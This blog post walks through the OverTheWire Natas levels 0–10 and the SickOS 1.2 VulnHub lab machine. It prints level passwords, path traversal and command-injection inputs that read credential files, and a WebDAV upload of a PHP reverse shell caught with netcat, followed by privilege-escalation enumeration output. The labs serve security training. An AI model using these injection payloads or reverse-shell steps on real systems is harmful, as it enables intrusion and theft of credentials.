Pages

Thursday 19 January 2017

Natas Level 0 to 10

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of  Natas Level 0 to 10:
http://overthewire.org/wargames/natas/

L 0

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
<body>
<h1>natas0</h1>
<div id="content">
You can find the password for the next level on this page.

<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
</div>
</body>
</html>

 L1
 Chrome -> Ctrl+U
 <html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
<h1>natas1</h1>
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!

<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->
</div>
</body>
</html>

L2
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

http://natas.labs.overthewire.org/js/wechall-data.js
var wechalldata = {
    "natas0": 1,
    "natas1": 2,
    "natas2": 3,
    "natas3": 4,
    "natas4": 5,
    "natas5": 6,
    "natas6": 7,
    "natas7": 8,
    "natas8": 15,
    "natas9": 14,
    "natas10": 13,
    "natas11": 12,
    "natas12": 11,
    "natas13": 10,
    "natas14": 9,
    "natas15": 16,
    "natas16": 17,
    "natas17": 18,
    "natas18": 137,
    "natas19": 138,
    "natas20": 139,
    "natas21": 140,
    "natas22": 141,
    "natas23": 142,
    "natas24": 213,
    "natas25": 214,
    "natas26": 215,
    "natas27": 216
}

http://natas2.natas.labs.overthewire.org/files/
[IMG] pixel.png 2016-06-25 11:58 303
[TXT] users.txt 2016-06-25 12:42 145

# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH


L3:
User-agent: *
Disallow: /s3cr3t/

http://natas3.natas.labs.overthewire.org//s3cr3t/users.txt
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

L4:
Burp -> Proxy -> Intercept On -> Add -> Refferer natas5.natas.labs.overthewire.org

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

L5:
GET / HTTP/1.1
Host: natas5.natas.labs.overthewire.org
Cache-Control: max-age=0
Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: bg,en-US;q=0.8,en;q=0.6
Cookie: __cfduid=ddd2731304b504d954af409bf2c0724731481120164; loggedin=1
DNT: 1
Connection: close

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div>
</body>
</html>

L6:
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head>
<body>
<h1>natas6</h1>
<div id="content">

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

http://natas6.natas.labs.overthewire.org/includes/secret.inc
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

L7:

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas7", "pass": "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" };</script></head>
<body>
<h1>natas7</h1>
<div id="content">

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
</div>
</body>
</html>

http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

L8:
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas8", "pass": "<censored>" };</script></head>
<body>
<h1>natas8</h1>
<div id="content">

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

echo 3d3d516343746d4d6d6c315669563362 | xxd -r -p | rev | base64 -d

 oubWYf2kBq

 Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl


 L9:
 <html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas9", "pass": "W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl" };</script></head>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script></head>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

 http://natas9.natas.labs.overthewire.org/dictionary.txt

 test; ls -la ../
 Output:
-rw-r-----  1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

../:
total 156
drwxr-xr-x 39 root    root     4096 Jul 10 14:12 .
drwxr-xr-x  5 root    root     4096 Nov 14  2014 ..
drwxr-xr-x  5 root    root     4096 Jun 25  2016 main
drwxr-x---  2 natas0  natas0   4096 Jun 25  2016 natas0
drwxr-x---  2 natas1  natas1   4096 Jun 25  2016 natas1
drwxr-x---  2 natas10 natas10  4096 Jun 25  2016 natas10
drwxr-x---  2 natas11 natas11  4096 Jun 25  2016 natas11
drwxr-x---  3 natas12 natas12  4096 Jun 25  2016 natas12
drwxr-x---  3 natas13 natas13  4096 Jun 25  2016 natas13
drwxr-x---  2 natas14 natas14  4096 Jun 25  2016 natas14
drwxr-x---  2 natas15 natas15  4096 Jun 25  2016 natas15
drwxr-x---  2 natas16 natas16  4096 Jun 25  2016 natas16
drwxr-x---  2 natas17 natas17  4096 Jul 10 14:12 natas17
drwxr-x---  2 natas18 natas18  4096 Jun 25  2016 natas18
drwxr-x---  2 natas19 natas19  4096 Jun 25  2016 natas19
drwxr-x---  3 natas2  natas2   4096 Jun 25  2016 natas2
drwxr-x---  2 natas20 natas20  4096 Jun 25  2016 natas20
drwxr-x---  2 natas21 natas21  4096 Jun 25  2016 natas21
drwxr-x---  2 natas21 natas21  4096 Jun 25  2016 natas21-experimenter
drwxr-x---  2 natas22 natas22  4096 Jun 25  2016 natas22
drwxr-x---  2 natas23 natas23  4096 Jun 25  2016 natas23
drwxr-x---  2 natas24 natas24  4096 Jun 25  2016 natas24
drwxr-x---  3 natas25 natas25  4096 Jun 25  2016 natas25
drwxr-x---  3 natas26 natas26  4096 Jun 25  2016 natas26
drwxr-x---  2 natas27 natas27  4096 Jun 25  2016 natas27
drwxr-x---  2 natas28 natas28  4096 Jun 25  2016 natas28
drwxr-x---  2 natas29 natas29  4096 Jun 25  2016 natas29
drwxr-x---  3 natas3  natas3   4096 Jun 25  2016 natas3
drwxr-x---  2 natas30 natas30  4096 Jun 25  2016 natas30
drwxr-x---  3 natas31 natas31  4096 Jun 25  2016 natas31
drwxr-x---  3 natas32 natas32  4096 Jun 25  2016 natas32
drwxr-x---  2 natas33 natas33  4096 Jun 25  2016 natas33
drwxr-x---  2 natas4  natas4   4096 Jun 25  2016 natas4
drwxr-x---  2 natas5  natas5   4096 Jun 25  2016 natas5
drwxr-x---  3 natas6  natas6   4096 Jun 25  2016 natas6
drwxr-x---  2 natas7  natas7   4096 Jun 25  2016 natas7
drwxr-x---  2 natas8  natas8   4096 Jun 25  2016 natas8
drwxr-x---  2 natas9  natas9   4096 Jun 25  2016 natas9
drwxr-x---  4 root    www-data 4096 Jun 25  2016 stats

test; ls -la ../../../../../-rw-r-----  1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

../../../../../:
total 7965
drwxr-xr-x  26 root root    4096 Mar 13  2016 .
drwxr-xr-x  26 root root    4096 Mar 13  2016 ..
-rw-r--r--   1 root root    2797 Nov  4  2015 README.txt
lrwxrwxrwx   1 root root      15 Nov 14  2014 behemoth -> /games/behemoth
drwxr-xr-x   2 root root    4096 Nov 17 09:14 bin
drwxr-xr-x   2 root root    4096 Apr 20  2014 boot
drwxr-xr-x  12 root root   13680 Dec 23 13:00 dev
drwxr-xr-x   7 root root    4096 Jan 12  2015 drifter
lrwxrwxrwx   1 root root      11 Nov 14  2014 eloi -> /games/eloi
drwxr-xr-x 108 root root    4096 Jan  6 13:46 etc
drwxr-xr-x  11 root root    1024 Mar 18  2015 games
drwxr-xr-x 172 root root    4096 Jul 10 14:12 home
lrwxrwxrwx   1 root root      14 Nov 14  2014 krypton -> /games/krypton
drwxr-xr-x  18 root root    4096 Jun 10  2016 lib
drwxr-xr-x   2 root root    4096 Jun 10  2016 lib32
drwxr-xr-x   2 root root    4096 Jun 10  2016 lib64
drwxr-xr-x   2 root root    4096 Jun 10  2016 libx32
drwx------   2 root root   16384 Apr 20  2014 lost+found
lrwxrwxrwx   1 root root      14 Nov 14  2014 manpage -> /games/manpage
lrwxrwxrwx   1 root root      11 Nov 14  2014 maze -> /games/maze
drwxr-xr-x   3 root root    4096 Apr 20  2014 media
drwxr-xr-x   2 root root    4096 Apr 10  2014 mnt
lrwxrwxrwx   1 root root      13 Nov 14  2014 narnia -> /games/narnia
drwxr-xr-x   2 root root    4096 Apr 16  2014 opt
dr-xr-xr-x 547 root root       0 Dec 23 13:00 proc
drwx------  11 root root    4096 Jul 10 14:12 root
drwxr-xr-x  18 root root     680 Jan  6 20:52 run
drwxr-xr-x   2 root root   12288 Sep 30 13:28 sbin
lrwxrwxrwx   1 root root      13 Nov 14  2014 semtex -> /games/semtex
drwxr-xr-x   2 root root    4096 Apr 16  2014 srv
dr-xr-xr-x  13 root root       0 Dec 23 13:29 sys
drwxrwx-wt   1 root root 8036352 Jan  6 20:52 tmp
drwxr-xr-x  12 root root    4096 Nov 14  2014 usr
lrwxrwxrwx   1 root root      13 Nov 14  2014 utumno -> /games/utumno
drwxr-xr-x  15 root root    4096 Nov 14  2014 var
lrwxrwxrwx   1 root root      13 Nov 14  2014 vortex -> /games/vortex

test;cat ../../../../../README.txt
Output:
             
      ,----..            ,----,          .---.
     /   /   \         ,/   .`|         /. ./|
    /   .     :      ,`   .'  :     .--'.  ' ;
   .   /   ;.  \   ;    ;     /    /__./ \ : |
  .   ;   /  ` ; .'___,/    ,' .--'.  '   \' .
  ;   |  ; \ ; | |    :     | /___/ \ |    ' '
  |   :  | ; | ' ;    |.';  ; ;   \  \;      :
  .   |  ' ' ' : `----'  |  |  \   ;  `      |
  '   ;  \; /  |     '   :  ;   .   \    .\  ;
   \   \  ',  /      |   |  '    \   \   ' \ |
    ;   :    /       '   :  |     :   '  |--"
     \   \ .'        ;   |.'       \   \ ;  
  www. `---` ver     '---' he       '---" ire.org  
             
           
Welcome to the OverTheWire games machine!

If you find any problems, please report them to Steven on
irc.overthewire.org.

--[ Playing the games ]--

  This machine holds several wargames.
  If you are playing "somegame", then:

    * USERNAMES are somegame0, somegame1, ...
    * Most LEVELS are stored in /somegame/.
    * PASSWORDS for each level are stored in /etc/somegame_pass/.

  Write-access to homedirectories is disabled. It is advised to create a
  working directory with a hard-to-guess name in /tmp/.  You can use the
  command "mktemp -d" in order to generate a random and hard to guess
  directory in /tmp/.  Read-access to both /tmp/ and /proc/ is disabled
  so that users can not snoop on eachother.

  Please play nice:
   
    * don't leave orphan processes running
    * don't leave exploit-files laying around
    * don't annoy other players
    * don't post passwords or spoilers
    * again, DONT POST SPOILERS!
      This includes writeups of your solution on your blog or website!

--[ Tips ]--

  This machine has a 64bit processor and many security-features enabled
  by default, although ASLR has been switched off.  The following
  compiler flags might be interesting:

    -m32                    compile for 32bit
    -fno-stack-protector    disable ProPolice
    -Wl,-z,norelro          disable relro

  In addition, the execstack tool can be used to flag the stack as
  executable on ELF binaries.

  Finally, network-access is limited for most levels by a local
  firewall.

--[ Tools ]--

 For your convenience we have installed a few usefull tools which you can find
 in the following locations:

    * peda (https://github.com/longld/peda.git) in /usr/local/peda/
    * gdbinit (https://github.com/gdbinit/Gdbinit) in /usr/local/gdbinit/
    * pwntools (https://github.com/Gallopsled/pwntools) in /usr/src/pwntools/
    * radare2 (http://www.radare.org/) should be in $PATH

--[ More information ]--

  For more information regarding individual wargames, visit
  http://www.overthewire.org/wargames/

  For questions or comments, contact us through IRC on
  irc.overthewire.org.

 test;cat ../../../../../etc/natas_webpass/natas10
 nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

 test;cat ../../../../../etc/lsb-release
 DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS

L10:
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas10", "pass": "<censored>" };</script></head>
<body>
<h1>natas10</h1>
<div id="content">

For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

. /etc/natas_webpass/natas11
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Regards,
Yuriy Stanchev/URIX

SickOS 1.2

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of SickOs 1.2 vulnarable VM: 
https://www.vulnhub.com/entry/sickos-12,144/

Home brewed tools used: https://github.com/iuristanchev/pentesting_tools

Currently scanning: Finished!   |   Screen View: Unique Hosts              
                                                                             
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
 -----------------------------------------------------------------------------
 192.168.1.9     00:0c:29:98:f5:19      1      60  VMware, Inc.              

 Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:24 EET
Nmap scan report for 192.168.1.9
Host is up (0.00026s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
| http-useragent-tester:
|
|     Allowed User Agents:
|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
|     libwww
|     lwp-trivial
|     libcurl-agent/1.0
|     PHP/
|     Python-urllib/2.5
|     GT::WWW
|     Snoopy
|     MFC_Tear_Sample
|     HTTP::Lite
|     PHPCrawl
|     URI::Fetch
|     Zend_Http_Client
|     http client
|     PECL::HTTP
|     Wget/1.13.4 (linux-gnu)
|     WWW-Mechanize/1.34
|_
MAC Address: 00:0C:29:98:F5:19 (VMware)


 Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00016s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.9
|  
|     Path: http://192.168.1.9:80/
|     Line number: 96
|     Comment:
|         <!-- NOTHING IN HERE ///\\\ -->
|  
|     Path: http://192.168.1.9:80/
|     Line number: 96
|     Comment:
|_         ///\\\ -->>>>
MAC Address: 00:0C:29:98:F5:19 (VMware)

amap v5.4 (www.thc.org/thc-amap) started at 2017-01-04 20:34:33 - APPLICATION MAPPING mode

Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
Protocol on 192.168.1.9:80/tcp matches http - banner: HTTP/1.0 200 OK\r\nX-Powered-By PHP/5.3.10-1ubuntu3.21\r\nContent-type text/html\r\nContent-Length 163\r\nConnection close\r\nDate Wed, 04 Jan 2017 203433 GMT\r\nServer lighttpd/1.4.28\r\n\r\n<html>\n\n<img src="blow.jpg">\n\n</html>\n\n\n\n\n\n\n\n\n\n\n

DIRB v2.22  
By The Dark Raver
-----------------

START_TIME: Wed Jan  4 20:57:05 2017
URL_BASE: http://192.168.1.9:80/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                      

---- Scanning URL: http://192.168.1.9:80/ ----
==> DIRECTORY: http://192.168.1.9:80/test/                                  
+ http://192.168.1.9:80/~sys~ (CODE:403|SIZE:345)                            
                                                                             
---- Entering directory: http://192.168.1.9:80/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                      
    (Use mode '-w' if you want to scan it anyway)

*   Trying 192.168.1.9...
* Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.1.9
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Wed, 04 Jan 2017 21:01:06 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.1.9 left intact
nc -nlvp 443
curl --upload-file  /root/Desktop/pentesting_tools/tools/php-reverse-shell.txt -v --url http://192.168.1.9/test/shell.php -0 --http1.0

*   Trying 192.168.1.9...
* Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
> PUT /test/shell.php HTTP/1.0
> Host: 192.168.1.9
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 5495
>
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Wed, 04 Jan 2017 21:43:01 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0

nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.20] from (UNKNOWN) [192.168.1.9] 46960
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 13:43:47 up  1:30,  0 users,  load average: 0.02, 0.04, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$

python -c 'import pty; pty.spawn("/bin/sh")'

cat /etc/debian_version
wheezy/sid

uname -v
#25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
#

Debug Info
thorough tests = disabled


Scan started at:
Thu Jan  5 09:43:36 PST 2017


### SYSTEM ##############################################
Kernel information:
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux


Kernel information (continued):
Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014


Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.4 LTS"
NAME="Ubuntu"
VERSION="12.04.4 LTS, Precise Pangolin"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
VERSION_ID="12.04"


Hostname:
ubuntu


### USER/GROUP ##########################################
Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Users that have previously logged onto the system:
Username         Port     From             Latest
root             pts/0    192.168.0.100    Tue Apr 26 03:57:15 -0700 2016
john             tty1                      Wed Mar 30 05:09:38 -0700 2016


All users and uid/gid info:
root:x:0:0
daemon:x:1:1
bin:x:2:2
sys:x:3:3
sync:x:4:65534
games:x:5:60
man:x:6:12
lp:x:7:7
mail:x:8:8
news:x:9:9
uucp:x:10:10
proxy:x:13:13
www-data:x:33:33
backup:x:34:34
list:x:38:38
irc:x:39:39
gnats:x:41:41
nobody:x:65534:65534
libuuid:x:100:101
syslog:x:101:103
messagebus:x:102:104
john:x:1000:1000
sshd:x:103:65534


Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=103(syslog) groups=103(syslog)
uid=102(messagebus) gid=104(messagebus) groups=104(messagebus)
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)


Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash


Super user account(s):
root


Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root root 4.0K Mar 30  2016 .
drwxr-xr-x 22 root root 4.0K Mar 30  2016 ..
drwxr-xr-x  3 john john 4.0K Apr 12  2016 john


Root is allowed to login via SSH:
PermitRootLogin yes


### ENVIRONMENTAL #######################################
Path information:
/sbin:/bin:/usr/sbin:/usr/bin


Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash


Current umask value:
0000
u=rwx,g=rwx,o=rwx


umask value as specified in /etc/login.defs:
UMASK 022


Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
Cron jobs:
-rw-r--r-- 1 root root  722 Jun 19  2012 /etc/crontab

/etc/cron.daily:
total 72
drwxr-xr-x  2 root root  4096 Apr 12  2016 .
